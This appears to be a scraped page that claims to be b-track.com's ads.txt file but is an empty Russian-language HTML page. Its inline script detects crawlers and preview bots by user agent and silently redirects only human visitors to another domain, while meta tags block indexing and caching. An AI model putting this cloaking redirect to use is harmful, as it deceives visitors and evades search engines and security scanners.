b-track.com Ads.txt file
<!doctype html>
<html lang="ru">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noimageindex" />
<meta name="googlebot" content="noindex, nofollow, noarchive, nosnippet, noimageindex" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, max-age=0" />
<meta http-equiv="Pragma" content="no-cache" />
<script>
(function () {
var ua = (navigator.userAgent || '').toLowerCase();
var looksLikeBot = /(bot|spider|crawler|crawl|slurp|bingpreview|facebookexternalhit|ia_archiver|pingdom|monitor|skypeuripreview|whatsapp|telegram|discord|bitly|twitterbot)/.test(ua);
if (!looksLikeBot) {
setTimeout(function () {
window.location.replace('https://btrack.org');
}, 200);
}
})();
</script>
</head>
<body>
</body>
</html>